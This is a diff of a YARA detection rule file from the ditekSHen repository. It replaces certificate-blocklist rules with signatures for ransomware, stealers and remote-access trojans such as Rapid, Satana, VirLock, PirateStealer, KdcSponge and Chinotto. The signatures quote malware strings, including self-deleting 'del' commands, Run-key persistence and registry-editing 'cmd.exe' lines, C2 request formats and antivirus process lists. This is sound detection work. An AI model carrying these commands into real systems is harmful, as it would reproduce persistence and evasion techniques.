+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3D31Ed3B22867F425Db86Fb532Eb449F : FILE
+rule DITEKSHEN_MALWARE_Win_Zombieboy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ZombieBoy Downloader"
 		author = "ditekSHen"
-		id = "a9924b9e-381a-58b2-8839-fcafeb730a32"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c1345196-1686-534c-ab4c-557113c83411"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3082-L3093"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8523-L8532"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3ec4fcd47867b688241dee693bcec98e633e179757ec8e7afd755c7d53a0cd7"
+		logic_hash = "0840367c1b56c4c266f22400df95411ba7784b98919a922380e1ec789783bb65"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1e708efa130d1e361afb76cc94ba22aca3553590"
-		importance = 20
+
+	strings:
+		$s1 = ":\\Users\\ZombieBoy\\" ascii wide
+		$s2 = "RookIE/1.0" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Badfcbdbcdbfafcaeebad" and pe.signatures [ i ] . serial == "3d:31:ed:3b:22:86:7f:42:5d:b8:6f:b5:32:eb:44:9f" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_531549Ed4D2D53Fc7E1Beb47C6B13D58 : FILE
+rule DITEKSHEN_MALWARE_Win_Pcrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PCRat / Gh0st"
 		author = "ditekSHen"
-		id = "6aec64ae-cda3-57e8-94c6-07c1e07d34ad"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "de5b3e08-16da-56e2-a0a4-d8bed5840804"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3095-L3106"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8534-L8561"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "554574657a913dbe0c576dbfcdd93a2494f2ffccf51eaabf06e5fafe2a895c3a"
+		logic_hash = "ad56d7d6a2bb6d09bc4530c31b51456b6bbca5def1810449fd2a31973cce18f8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a8e1f6e32e5342265dd3e28cc65060fb7221c529"
-		importance = 20
+
+	strings:
+		$s1 = "ClearEventLogA" fullword ascii
+		$s2 = "NetUserAdd" fullword ascii
+		$s3 = "<H1>403 Forbidden</H1>" fullword ascii
+		$s4 = ":]%d-%d-%d  %d:%d:%d" fullword ascii
+		$s5 = "Mozilla/4.0 (compatible)" fullword ascii
+		$s6 = "<Enter>" fullword ascii
+		$s7 = "\\cmd.exe" fullword ascii
+		$s8 = "Program Files\\Internet Explorer\\IEXPLORE.EXE" fullword ascii
+		$s9 = "Collegesoft ScenicPlayer" fullword wide
+		$a1 = "360tray.exe" fullword ascii
+		$a2 = "avp.exe" fullword ascii
+		$a3 = "RavMonD.exe" fullword ascii
+		$a4 = "360sd.exe" fullword ascii
+		$a5 = "Mcshield.exe" fullword ascii
+		$a6 = "egui.exe" fullword ascii
+		$a7 = "kxetray.exe" fullword ascii
+		$a8 = "knsdtray.exe" fullword ascii
+		$a9 = "TMBMSRV.exe" fullword ascii
+		$a10 = "avcenter.exe" fullword ascii
+		$a11 = "ashDisp.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bdabfbdfbcbab" and pe.signatures [ i ] . serial == "53:15:49:ed:4d:2d:53:fc:7e:1b:eb:47:c6:b1:3d:58" )
+		uint16( 0 ) == 0x5a4d and 5 of ( $s* ) and 6 of ( $a* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_8035Ed9C58Ea895505B05Ff926D486Bc : FILE
+rule DITEKSHEN_MALWARE_Win_Rapid : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Rapid ransomware"
 		author = "ditekSHen"
-		id = "35b5d9a1-eaa8-53d8-9917-9a688fb95a04"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3a23f344-8345-5ae8-aacb-f2f422d3fc9d"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3108-L3119"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8563-L8585"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "caf1c962a0f4bd6c90753c6f1f0a2acadafa5fde6c7dacd02a3ca5cc15446ab4"
+		logic_hash = "c3f1bffeb402951da8bcccc899b2cdeb3c218b342d8338c750b9ff275537b4b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b82a7f87b7d7ccea50bba5fe8d8c1c745ebcb916"
-		importance = 20
+
+	strings:
+		$s1 = "encblklen" fullword ascii
+		$s2 = ".rapid" fullword ascii
+		$s3 = "BgIAAACkAABSU0E" ascii
+		$s4 = "IFdlIHNlbmQ" ascii
+		$s5 = "Software\\EncryptKeys" fullword ascii
+		$s6 = "local_enc_private_key" fullword ascii
+		$s7 = "local_public_key" fullword ascii
+		$s8 = "How Recovery Files.txt" ascii
+		$s9 = "recovery.txt" ascii
+		$s10 = "thr %i run %s" fullword ascii
+		$s11 = " /TN Encrypter" ascii
+		$s12 = /Encrypter_\d+/ fullword ascii
+		$s13 = "BleepingComputer_rapid" ascii wide
+		$m1 = "tell us your unique ID - ID-" ascii
+		$m2 = "really want to restore your files?" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fecddacdddfaadcddcabceded" and pe.signatures [ i ] . serial == "80:35:ed:9c:58:ea:89:55:05:b0:5f:f9:26:d4:86:bc" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 1 of ( $m* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Ca646B4275406Df639Cf603756F63D77 : FILE
+rule DITEKSHEN_MALWARE_Win_Satana : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Satana ransomware"
 		author = "ditekSHen"
-		id = "46603413-3e03-57d0-a141-1fee730de6c5"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f3cb7cc4-3c63-50b2-8e19-d675abbb33f8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3121-L3135"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8587-L8604"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "564ca7048413d6cd65371d65906132f62386410442b36b8bafeac5e09917465f"
+		logic_hash = "b2946e8c37be4a57237999aaa0c0a760a181306320162e04bc6fc12a542b81d5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "2a68cfad2d82caae48d4dcbb49aa73aaf3fe79dd"
-		importance = 20
+		snort_sid = "920269-920270"
+
+	strings:
+		$bf1 = "Try Decrypt: uc_size = %d, c_size = %d" ascii
+		$bf2 = "dwMailSelector = %d  dwBtcSelector = %d" ascii
+		$bf3 = "%s: Error DecB: 0x%X" ascii
+		$bf4 = "MBR written to Disk# %d" ascii
+		$bf5 = "!SATANA!" ascii wide nocase
+		$bf6 = "1 -th start" fullword ascii
+		$bf7 = "id=%d&code=%d&sdata=%d.%d.%d %d %d %s %s %d&name=%s&md5=%s&dlen=%s" ascii
+		$bf8 = "threadAdminFlood: %s %s %s" wide
+		$bf9 = "%s: NET RES FOUND: %s" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHOECORP LIMITED" and ( pe.signatures [ i ] . serial == "ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures [ i ] . serial == "00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" ) )
+		( uint16( 0 ) == 0x5a4d and 4 of ( $bf* ) ) or ( 5 of ( $bf* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E267Fdbdc16F22E8185D35C437F84C87 : FILE
+rule DITEKSHEN_MALWARE_Win_Virlock : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects VirLock ransomware"
 		author = "ditekSHen"
-		id = "520e335d-4b9f-5006-959a-1510312807be"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "dbf46963-3e74-54a0-8f7d-b24436c3ea2c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3137-L3148"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8606-L8624"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "403f0f8a65997d27494d7ac4aa99cf5ebb1471839f67b2f8b380225a0263fd67"
+		logic_hash = "8d516a0d771d7134c0f917f010b3973ed53b4ee7e4a2cf0bb5daecf9867b0081"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cdf4a69402936ece82f3f9163e6cc648bcbb2680"
-		importance = 20
+
+	strings:
+		$x1 = "BThere are two ways to pay a fine:" fullword wide
+		$x2 = "^Es gibt zwei M" fullword wide
+		$x3 = "glichkeiten, eine Strafe zahlen." fullword wide
+		$x4 = /usertile\d+\.bmp/ fullword wide
+		$s1 = "WinSock 2.0" fullword ascii
+		$s2 = "Running" fullword ascii
+		$s3 = "echo WScript.Sleep(50)>%TEMP%/file.vbs" fullword ascii
+		$s4 = "cscript %TEMP%/file.vbs" fullword ascii
+		$s5 = "del /F /Q file.js" fullword ascii
+		$s6 = "del /F /Q %1" fullword ascii
+		$s7 = "del /F /Q %0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APOTHEKA, s.r.o." and pe.signatures [ i ] . serial == "00:e2:67:fd:bd:c1:6f:22:e8:18:5d:35:c4:37:f8:4c:87" )
+		( uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 2 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $x* ) ) ) ) or ( 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Taffias : FILE
+rule DITEKSHEN_MALWARE_Win_Piratestealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PirateStealer"
 		author = "ditekSHen"
-		id = "7ace9b76-104c-511a-801b-0c2d5860eaba"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "07278b99-b990-5016-8389-fbd27538a722"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3150-L3161"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8626-L8644"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dc6b65757ceb3818101c8694680d1f44af3726876bef30843cfc2cb51ec6ea02"
-		score = 75
+		logic_hash = "c29fbc6cfa9e529218fa7315481e0922dc10b2da729931b8580bdd76ecdf6b68"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		thumbprint = "88d563dccb2ffc9c5f6d6a3721ad17203768735a"
-		importance = 20
+
+	strings:
+		$s1 = "PirateStealerBTW" wide
+		$s2 = "/PirateStealer/main/src/" wide
+		$s3 = "%WEBHOOK_LINK%" fullword wide
+		$s4 = "your_webhook_here" fullword wide
+		$s5 = "PirateMonsterInjector" ascii wide
+		$s6 = "DiscordProcesses" fullword ascii
+		$s7 = "GetDiscords" fullword ascii
+		$s8 = { 44 6f 77 6e 6c 6f 61 64 53 74 72 69 6e 67 00 47
+               65 74 46 6f 6c 64 65 72 50 61 74 68 00 57 65 62
+               68 6f 6f 6b 00 4b 69 6c 6c 00 50 72 6f 67 72 61
+               6d 00 53 79 73 74 65 6d 00 4d 61 69 6e 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TAFFIAS" and pe.signatures [ i ] . serial == "00" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_9F2492304Fc9C93844Dea7E5D6F0Ec77 : FILE
+rule DITEKSHEN_MALWARE_Win_Nglite : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NGLite"
 		author = "ditekSHen"
-		id = "73acca59-8362-5d34-b28a-71d141d3013a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b014ed4f-57b1-597e-befc-6e7f80855201"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3163-L3174"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8646-L8668"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9c76d5756cc79e96d194addc0e2c2c11fa4341ffa9df8f171f35df76cb9c56c0"
+		logic_hash = "d83663908949f69018461c73cf7137cf4ab16cc057cfe47942e6de0415ab5447"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "33015f23712f36e3ec310cfd1b16649abb645a98"
-		importance = 20
+
+	strings:
+		$x1 = "/lprey/main.go" ascii
+		$x2 = "/NGLiteV1.01/lprey/" ascii
+		$x3 = "/ng.com/lprey/" ascii
+		$x4 = "/mnt/hgfs/CrossC2-2.2/src/" ascii
+		$x5 = "WHATswrongwithUu" ascii
+		$s1 = "main.Preylistener" fullword ascii
+		$s2 = "main.Runcommand" fullword ascii
+		$s3 = "main.RandomPass" fullword ascii
+		$s4 = "main.AesEncode" fullword ascii
+		$s5 = "main.RsaEncode" fullword ascii
+		$s6 = "main.AesDecode" fullword ascii
+		$s7 = "main.initonce" fullword ascii
+		$s8 = "main.SendOnce" fullword ascii
+		$s9 = "main.clientConf" fullword ascii
+		$s10 = "main.Sender" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bbddebeea" and pe.signatures [ i ] . serial == "9f:24:92:30:4f:c9:c9:38:44:de:a7:e5:d6:f0:ec:77" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Dca9012634E8B609884Fe9284D30Eff5 : FILE
+rule DITEKSHEN_MALWARE_Win_Kdcsponge : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects KdcSponge"
 		author = "ditekSHen"
-		id = "f22ef616-c7f1-5036-b303-ef8ae038ec4f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "8832a141-a85d-5604-992e-7e9bd892d410"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3176-L3189"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8670-L8700"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b5d663228a27d5dae46f9f03bd04833b129fc453852cb9cb9fe43e405cdcecca"
+		logic_hash = "c891db94df9cde9eaa6096ad68d96c7b85a9c03e255ce43ccb8543a016bd3853"
 		score = 75
-		quality = 75
+		quality = 65
 		tags = "FILE"
-		thumbprint = "60971c18c7efb4a294f1d8ee802ff3d581c77834"
-		importance = 20
+		hash1 = "e391c2d3e8e4860e061f69b894cf2b1ba578a3e91de610410e7e9fa87c07304c"
+
+	strings:
+		$x1 = "\\share\\kdcdll\\user641.pdb" ascii
+		$x2 = "5ADSelf@tech*7890" fullword wide
+		$kdc1 = "KdcVerifyEncryptedTimeStamp" ascii wide nocase
+		$kdc2 = "KerbHashPasswordEx3" ascii wide nocase
+		$kdc3 = "KerbFreeKey" ascii wide nocase
+		$r1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
+		$r2 = "KDC Service" fullword ascii
+		$s1 = "download//symbols//%S//%S//%S" fullword wide
+		$s2 = "c:\\windows\\system32\\kdcsvc.dll" fullword wide nocase
+		$s3 = /WinHttp(Send|Receive)(Request|Response) failed (0x%.8X)/ fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bebaeefaeba" and ( pe.signatures [ i ] . serial == "dc:a9:01:26:34:e8:b6:09:88:4f:e9:28:4d:30:ef:f5" or pe.signatures [ i ] . serial == "00:dc:a9:01:26:34:e8:b6:09:88:4f:e9:28:4d:30:ef:f5" ) )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of them ) or ( all of ( $kdc* ) and ( 1 of ( $x* ) or all of ( $r* ) or 2 of ( $s* ) ) ) or ( 8 of them ) or ( pe.exports ( "MainFun" ) and pe.exports ( "NetApiBufferFree" ) and pe.exports ( "BeaEngineRevision" ) and pe.exports ( "BeaEngineVersion" ) and pe.exports ( "Disasm" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DsGetDcName" ) and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_781Ec65C3E38392D4C2F9E7F55F5C424 : FILE
+rule DITEKSHEN_MALWARE_Win_Chinotto : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Chinotto"
 		author = "ditekSHen"
-		id = "d056fb18-e641-50bb-af86-ea124203f16c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e66703d4-c9c6-5bb4-9e07-11dc89b0a034"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3191-L3202"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8702-L8754"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "00b01a874e29fd2e25200f5e50c7121c3cc4bca614c31dd149d6197088292b35"
+		logic_hash = "92f37bdc4cf17e07bb556c60e3bde4547c34f67a2fb5c806000d9cb2446adff1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "5d20e8f899c7e48a0269c2b504607632ba833e40"
-		importance = 20
+
+	strings:
+		$x1 = "xxxchinotto" ascii wide
+		$x2 = "\\Chinotto.pdb" ascii wide
+		$x3 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31
+                0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e
+                67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65
+                0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f
+                7a 69 6c 6c 61 2f 34 2e 30 28 63 6f 6d 70 61 74
+                69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20
+                57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20
+                53 56 31 29 0d 0a 41 63 63 65 70 74 3a 20 69 6d
+                61 67 65 2f 67 69 66 2c 20 69 6d 61 67 65 2f 78
+                2d 78 62 69 74 6d 61 70 2c 20 69 6d 61 67 65 2f
+                6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 6a 70 65
+                67 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78
+                2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68
+                2c 20 2a 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67
+                75 61 67 65 3a 20 65 6e 2d 75 73 0d 0a 43 6f 6e
+                74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69
+                70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 62
+                6f 75 6e 64 61 72 79 3d 25 73 0d 0a 48 6f 73 74
+                3a 20 25 73 3a 25 64 0d 0a 43 6f 6e 74 65 6e 74
+                2d 4c 65 6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e
+                6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c
+                69 76 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
+                6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a
+                00 00 00 00 48 54 54 50 2f 31 2e 31 20 32 30 30
+                20 4f 4b 00 0d 0a 0d 0a 00 00 00 00 65 72 72 6f
+                72 3c 2f 62 3e }
+		$s1 = "Run /v xxxzexs /t REG_SZ /d %s /f" ascii wide
+		$s2 = "ShellExecute Error, ret" ascii wide
+		$s3 = "Run app succeed" ascii
+		$s4 = "cleartemp:" fullword ascii
+		$s5 = "wakeup:" fullword ascii
+		$s6 = "updir:" fullword ascii
+		$s7 = "regstart:" fullword ascii
+		$s8 = "chdec:" fullword ascii
+		$s9 = "cmd:" fullword ascii
+		$s10 = "error</b>" fullword ascii
+		$c1 = "Host: %s:%d" ascii wide
+		$c2 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1)" ascii wide
+		$c3 = "Mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/78.0.3904.108 Safari/537.36" ascii wide
+		$c4 = "id=%s&type=hello&direction=send" ascii wide
+		$c5 = "id=%s&type=command&direction=receive" ascii wide
+		$c6 = "id=%s&type=file&direction=" ascii wide
+		$c7 = "id=%s&type=result&direction=" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Facacafbfddbdbfad" and pe.signatures [ i ] . serial == "78:1e:c6:5c:3e:38:39:2d:4c:2f:9e:7f:55:f5:c4:24" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $c* ) ) ) or 4 of ( $c* ) or 5 of ( $s* ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Bd1E93D5787A737Eef930C70986D2A69 : FILE
+rule DITEKSHEN_MALWARE_Win_Tardigrade : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Tardigrade"
 		author = "ditekSHen"
-		id = "3b5ec355-9d68-5285-bda0-ddd379ad1cf8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a46caaaa-2954-552a-a20f-952c47370393"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3204-L3215"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8756-L8787"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0332d05f0f53ad22516fd41cb10238ad0b92ef49011e9e71a82fa2da1de5e953"
+		logic_hash = "2bd4f23f66844a320b6bed6242ba39096f66a08affb84abd78c342d433ed9fe6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "921e5d7f9f05272b566533393d7194ea9227e582"
-		importance = 20
+		hash1 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858"
+		hash2 = "966b2c7c72a28310acd58bb23af4d3c893b2afca264b2d9c0ec42db815c77487"
+		hash3 = "88be5da274df704dc7fd9882c661a0afdd35f1ce0a7145e30f51c292abd2a86b"
+		hash4 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe"
+		hash5 = "4afd9f0dde092daeac3f3e6ffb0aee06682b3dba6005d2bd1a914eefd5cc6a30"
+
+	strings:
+		$x1 = "cmd.exe /c echo kOJAdtQoDcMuogIZIl>\"%s\"&exit" fullword ascii
+		$x2 = "cmd.exe /c echo HBnBcZPeUevCDQmKGzXxYJHqpzRAbRCQCihOxiLi>\"%s\"&exit" fullword ascii
+		$x3 = "cmd.exe /c set kpUUCjoLWLZvJFc=3167 & reg add HKCU\\SOFTWARE\\EQwIobTRgsJ /v PDMXPmqSYnUx /t REG_DWORD /d 10080 & exit" fullword ascii
+		$s1 = "ReplaceFileA" ascii
+		$s2 = "FlushFileBuffers" ascii
+		$s3 = "WaitNamedPipeA" ascii
+		$s4 = "ImpersonateNamedPipeClient" ascii
+		$s5 = "RegFlushKey" ascii
+		$s6 = /cmd\.exe \/c (echo|set)/ ascii
+		$s7 = ">\"%s\"&exit" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdefedddbdedbcbfffbeadb" and pe.signatures [ i ] . serial == "bd:1e:93:d5:78:7a:73:7e:ef:93:0c:70:98:6d:2a:69" )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( 1 of ( $x* ) or 6 of ( $s* ) ) and ( pe.exports ( "DllGetClassObject" ) and pe.exports ( "DllMain" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) and pe.exports ( "InitHelperDll" ) and pe.exports ( "StartW" ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_B0009Bb062F52Eb6001Ba79606De243D : FILE
+rule DITEKSHEN_MALWARE_Win_Clipbanker02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ClipBanker infostealer"
 		author = "ditekSHen"
-		id = "41293f0b-604a-5993-8b05-9ca639828eec"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c2a480cf-e81b-53a2-999a-80209050e0cf"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3217-L3228"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8789-L8814"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "111a08d62f483daf23220e7044cc291b6ea6922746d48934f72a892b7dfd762b"
+		logic_hash = "51a43245b1e0b6fea874302b73bf552012c54c3f7c12b8c447c96c2ffdcc1dcb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c89f06937d24b7f13be5edba5e0e2f4e05bc9b13"
-		importance = 20
+
+	strings:
+		$x1 = "\\Allcome\\Source code\\Clipper\\" ascii nocase
+		$x2 = "\\cleaper\\Release\\cleaper.pdb" ascii nocase
